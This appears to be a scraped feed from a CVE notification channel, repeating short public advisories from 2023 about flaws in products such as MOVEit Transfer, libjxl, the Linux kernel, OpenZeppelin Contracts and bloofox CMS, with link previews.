๐จ CVE-2023-2820
An information disclosure vulnerability in the faye endpoint in Proofpoint Threat Response / Threat Response Auto-Pull (PTR/TRAP) could be used by an attacker on an adjacent network to obtain credentials to integrated services via a man-in-the-middle position or cryptanalysis of the session traffic. An attacker could use these credentials to impersonate PTR/TRAP to these services. All versions prior to 5.10.0 are affected.
๐@cveNotify
An information disclosure vulnerability in the faye endpoint in Proofpoint Threat Response / Threat Response Auto-Pull (PTR/TRAP) could be used by an attacker on an adjacent network to obtain credentials to integrated services via a man-in-the-middle position or cryptanalysis of the session traffic. An attacker could use these credentials to impersonate PTR/TRAP to these services. All versions prior to 5.10.0 are affected.
๐@cveNotify
Proofpoint
Proofpoint Threat Response / Threat Response Auto-Pull (PTR/TRAP) Information Disclosure | Proofpoint US
Proofpoint Threat Response / Threat Response Auto-Pull (PTR/TRAP) Information Disclosure Proofpoint Threat Response / Threat Response Auto-Pull (PTR/TRAP)โฆ
๐จ CVE-2023-35708
In Progress MOVEit Transfer before 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), and 2023.0.3 (15.0.3), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to MOVEit Transfer's database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content. These are fixed versions of the DLL drop-in: 2020.1.10 (12.1.10), 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), and 2023.0.3 (15.0.3).
๐@cveNotify
In Progress MOVEit Transfer before 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), and 2023.0.3 (15.0.3), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to MOVEit Transfer's database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content. These are fixed versions of the DLL drop-in: 2020.1.10 (12.1.10), 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), and 2023.0.3 (15.0.3).
๐@cveNotify
๐จ CVE-2023-35790
An issue was discovered in dec_patch_dictionary.cc in libjxl before 0.8.2. An integer underflow in patch decoding can lead to a denial of service, such as an infinite loop.
๐@cveNotify
An issue was discovered in dec_patch_dictionary.cc in libjxl before 0.8.2. An integer underflow in patch decoding can lead to a denial of service, such as an infinite loop.
๐@cveNotify
GitHub
Release v0.8.2 ยท libjxl/libjxl
Changed
Security: Fix an integer underflow bug in patch decoding (#2551- CVE-2023-35790).
Note: This release is for evaluation purposes and may contain bugs, including security bugs, that may not...
Security: Fix an integer underflow bug in patch decoding (#2551- CVE-2023-35790).
Note: This release is for evaluation purposes and may contain bugs, including security bugs, that may not...
๐จ CVE-2023-35789
An issue was discovered in the C AMQP client library (aka rabbitmq-c) through 0.13.0 for RabbitMQ. Credentials can only be entered on the command line (e.g., for amqp-publish or amqp-consume) and are thus visible to local attackers by listing a process and its arguments.
๐@cveNotify
An issue was discovered in the C AMQP client library (aka rabbitmq-c) through 0.13.0 for RabbitMQ. Credentials can only be entered on the command line (e.g., for amqp-publish or amqp-consume) and are thus visible to local attackers by listing a process and its arguments.
๐@cveNotify
GitHub
insecure password option ยท Issue #575 ยท alanxz/rabbitmq-c
Hi, the command line tools like amqp-publish and amqp-consume are insecure, since the username/password can be given as a command line parameter either with --password= or as part of the URL given ...
๐จ CVE-2023-35788
An issue was discovered in fl_set_geneve_opt in net/sched/cls_flower.c in the Linux kernel before 6.3.7. It allows an out-of-bounds write in the flower classifier code via TCA_FLOWER_KEY_ENC_OPTS_GENEVE packets. This may result in denial of service or privilege escalation.
๐@cveNotify
An issue was discovered in fl_set_geneve_opt in net/sched/cls_flower.c in the Linux kernel before 6.3.7. It allows an out-of-bounds write in the flower classifier code via TCA_FLOWER_KEY_ENC_OPTS_GENEVE packets. This may result in denial of service or privilege escalation.
๐@cveNotify
๐จ CVE-2023-33438
A stored Cross-site scripting (XSS) vulnerability in Wolters Kluwer TeamMate+ 35.0.11.0 allows remote attackers to inject arbitrary web script or HTML.
๐@cveNotify
A stored Cross-site scripting (XSS) vulnerability in Wolters Kluwer TeamMate+ 35.0.11.0 allows remote attackers to inject arbitrary web script or HTML.
๐@cveNotify
GitHub
CVEs/CVE-2023-33438/README.md at main ยท justas-dee/CVEs
Contribute to justas-dee/CVEs development by creating an account on GitHub.
๐จ CVE-2023-30905
The MC990 X and UV300 RMC component has and inadequate default configuration that could be exploited to obtain enhanced privilege.
๐@cveNotify
The MC990 X and UV300 RMC component has and inadequate default configuration that could be exploited to obtain enhanced privilege.
๐@cveNotify
๐จ CVE-2023-30904
A security vulnerability in HPE Insight Remote Support may result in the local disclosure of privileged LDAP information.
๐@cveNotify
A security vulnerability in HPE Insight Remote Support may result in the local disclosure of privileged LDAP information.
๐@cveNotify
๐จ CVE-2023-30903
HP-UX could be exploited locally to create a Denial of Service (DoS) when any physical interface is configured with IPv6/inet6.
๐@cveNotify
HP-UX could be exploited locally to create a Denial of Service (DoS) when any physical interface is configured with IPv6/inet6.
๐@cveNotify
๐จ CVE-2023-34459
OpenZeppelin Contracts is a library for smart contract development. Starting in version 4.7.0 and prior to version 4.9.2, when the `verifyMultiProof`, `verifyMultiProofCalldata`, `procesprocessMultiProof`, or `processMultiProofCalldat` functions are in use, it is possible to construct merkle trees that allow forging a valid multiproof for an arbitrary set of leaves.
A contract may be vulnerable if it uses multiproofs for verification and the merkle tree that is processed includes a node with value 0 at depth 1 (just under the root). This could happen inadvertedly for balanced trees with 3 leaves or less, if the leaves are not hashed. This could happen deliberately if a malicious tree builder includes such a node in the tree.
A contract is not vulnerable if it uses single-leaf proving (`verify`, `verifyCalldata`, `processProof`, or `processProofCalldata`), or if it uses multiproofs with a known tree that has hashed leaves. Standard merkle trees produced or validated with the @openzeppelin/merkle-tree library are safe.
The problem has been patched in version 4.9.2.
Some workarounds are available. For those using multiproofs: When constructing merkle trees hash the leaves and do not insert empty nodes in your trees. Using the @openzeppelin/merkle-tree package eliminates this issue. Do not accept user-provided merkle roots without reconstructing at least the first level of the tree. Verify the merkle tree structure by reconstructing it from the leaves.
๐@cveNotify
OpenZeppelin Contracts is a library for smart contract development. Starting in version 4.7.0 and prior to version 4.9.2, when the `verifyMultiProof`, `verifyMultiProofCalldata`, `procesprocessMultiProof`, or `processMultiProofCalldat` functions are in use, it is possible to construct merkle trees that allow forging a valid multiproof for an arbitrary set of leaves.
A contract may be vulnerable if it uses multiproofs for verification and the merkle tree that is processed includes a node with value 0 at depth 1 (just under the root). This could happen inadvertedly for balanced trees with 3 leaves or less, if the leaves are not hashed. This could happen deliberately if a malicious tree builder includes such a node in the tree.
A contract is not vulnerable if it uses single-leaf proving (`verify`, `verifyCalldata`, `processProof`, or `processProofCalldata`), or if it uses multiproofs with a known tree that has hashed leaves. Standard merkle trees produced or validated with the @openzeppelin/merkle-tree library are safe.
The problem has been patched in version 4.9.2.
Some workarounds are available. For those using multiproofs: When constructing merkle trees hash the leaves and do not insert empty nodes in your trees. Using the @openzeppelin/merkle-tree package eliminates this issue. Do not accept user-provided merkle roots without reconstructing at least the first level of the tree. Verify the merkle tree structure by reconstructing it from the leaves.
๐@cveNotify
GitHub
Merge pull request from GHSA-wprv-93r4-jj2p ยท OpenZeppelin/openzeppelin-contracts@4d2383e
OpenZeppelin Contracts is a library for secure smart contract development. - Merge pull request from GHSA-wprv-93r4-jj2p ยท OpenZeppelin/openzeppelin-contracts@4d2383e
๐จ CVE-2023-3295
The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) for WordPress is vulnerable to arbitrary file uploads due to missing file type validation of files in the file manager functionality in versions up to, and including, 1.5.66 . This makes it possible for authenticated attackers, with contributor-level permissions and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. The issue was partially patched in version 1.5.66 and fully patched in 1.5.67
๐@cveNotify
The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) for WordPress is vulnerable to arbitrary file uploads due to missing file type validation of files in the file manager functionality in versions up to, and including, 1.5.66 . This makes it possible for authenticated attackers, with contributor-level permissions and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. The issue was partially patched in version 1.5.66 and fully patched in 1.5.67
๐@cveNotify
๐1
๐จ CVE-2023-34756
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the cid parameter at admin/index.php?mode=settings&page=charset&action=edit.
๐@cveNotify
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the cid parameter at admin/index.php?mode=settings&page=charset&action=edit.
๐@cveNotify
cyb
bloofox v0.5.2.1 was discovered to contain many SQL injection vulnerability
Vendor Homepage:
bloofoxCMS - Home
Version:
0.5.2.1
Tested On:
Macos, review source code
Affected Page:
admin/index.php?mode=settings&page=projects&action=edit [Parameter cid]
admin/index.php?mode=settings&page=plugins&action=edit[Parameter pid]
admi...
bloofoxCMS - Home
Version:
0.5.2.1
Tested On:
Macos, review source code
Affected Page:
admin/index.php?mode=settings&page=projects&action=edit [Parameter cid]
admin/index.php?mode=settings&page=plugins&action=edit[Parameter pid]
admi...
๐จ CVE-2023-34755
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the userid parameter at admin/index.php?mode=user&action=edit.
๐@cveNotify
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the userid parameter at admin/index.php?mode=user&action=edit.
๐@cveNotify
cyb
bloofox v0.5.2.1 was discovered to contain many SQL injection vulnerability
Vendor Homepage:
bloofoxCMS - Home
Version:
0.5.2.1
Tested On:
Macos, review source code
Affected Page:
admin/index.php?mode=settings&page=projects&action=edit [Parameter cid]
admin/index.php?mode=settings&page=plugins&action=edit[Parameter pid]
admi...
bloofoxCMS - Home
Version:
0.5.2.1
Tested On:
Macos, review source code
Affected Page:
admin/index.php?mode=settings&page=projects&action=edit [Parameter cid]
admin/index.php?mode=settings&page=plugins&action=edit[Parameter pid]
admi...
๐จ CVE-2023-34753
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the tid parameter at admin/index.php?mode=settings&page=tmpl&action=edit.
๐@cveNotify
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the tid parameter at admin/index.php?mode=settings&page=tmpl&action=edit.
๐@cveNotify
cyb
bloofox v0.5.2.1 was discovered to contain many SQL injection vulnerability
Vendor Homepage:
bloofoxCMS - Home
Version:
0.5.2.1
Tested On:
Macos, review source code
Affected Page:
admin/index.php?mode=settings&page=projects&action=edit [Parameter cid]
admin/index.php?mode=settings&page=plugins&action=edit[Parameter pid]
admi...
bloofoxCMS - Home
Version:
0.5.2.1
Tested On:
Macos, review source code
Affected Page:
admin/index.php?mode=settings&page=projects&action=edit [Parameter cid]
admin/index.php?mode=settings&page=plugins&action=edit[Parameter pid]
admi...
๐จ CVE-2023-34752
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the lid parameter at admin/index.php?mode=settings&page=lang&action=edit.
๐@cveNotify
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the lid parameter at admin/index.php?mode=settings&page=lang&action=edit.
๐@cveNotify
๐จ CVE-2023-34751
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the gid parameter at admin/index.php?mode=user&page=groups&action=edit.
๐@cveNotify
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the gid parameter at admin/index.php?mode=user&page=groups&action=edit.
๐@cveNotify
cyb
bloofox v0.5.2.1 was discovered to contain many SQL injection vulnerability
Vendor Homepage:
bloofoxCMS - Home
Version:
0.5.2.1
Tested On:
Macos, review source code
Affected Page:
admin/index.php?mode=settings&page=projects&action=edit [Parameter cid]
admin/index.php?mode=settings&page=plugins&action=edit[Parameter pid]
admi...
bloofoxCMS - Home
Version:
0.5.2.1
Tested On:
Macos, review source code
Affected Page:
admin/index.php?mode=settings&page=projects&action=edit [Parameter cid]
admin/index.php?mode=settings&page=plugins&action=edit[Parameter pid]
admi...
๐จ CVE-2023-34754
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the pid parameter at admin/index.php?mode=settings&page=plugins&action=edit.
๐@cveNotify
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the pid parameter at admin/index.php?mode=settings&page=plugins&action=edit.
๐@cveNotify
cyb
bloofox v0.5.2.1 was discovered to contain many SQL injection vulnerability
Vendor Homepage:
bloofoxCMS - Home
Version:
0.5.2.1
Tested On:
Macos, review source code
Affected Page:
admin/index.php?mode=settings&page=projects&action=edit [Parameter cid]
admin/index.php?mode=settings&page=plugins&action=edit[Parameter pid]
admi...
bloofoxCMS - Home
Version:
0.5.2.1
Tested On:
Macos, review source code
Affected Page:
admin/index.php?mode=settings&page=projects&action=edit [Parameter cid]
admin/index.php?mode=settings&page=plugins&action=edit[Parameter pid]
admi...
๐จ CVE-2023-34750
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the cid parameter at admin/index.php?mode=settings&page=projects&action=edit.
๐@cveNotify
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the cid parameter at admin/index.php?mode=settings&page=projects&action=edit.
๐@cveNotify
cyb
bloofox v0.5.2.1 was discovered to contain many SQL injection vulnerability
Vendor Homepage:
bloofoxCMS - Home
Version:
0.5.2.1
Tested On:
Macos, review source code
Affected Page:
admin/index.php?mode=settings&page=projects&action=edit [Parameter cid]
admin/index.php?mode=settings&page=plugins&action=edit[Parameter pid]
admi...
bloofoxCMS - Home
Version:
0.5.2.1
Tested On:
Macos, review source code
Affected Page:
admin/index.php?mode=settings&page=projects&action=edit [Parameter cid]
admin/index.php?mode=settings&page=plugins&action=edit[Parameter pid]
admi...
๐จ CVE-2023-3230
Missing Authorization in GitHub repository fossbilling/fossbilling prior to 0.5.0.
๐@cveNotify
Missing Authorization in GitHub repository fossbilling/fossbilling prior to 0.5.0.
๐@cveNotify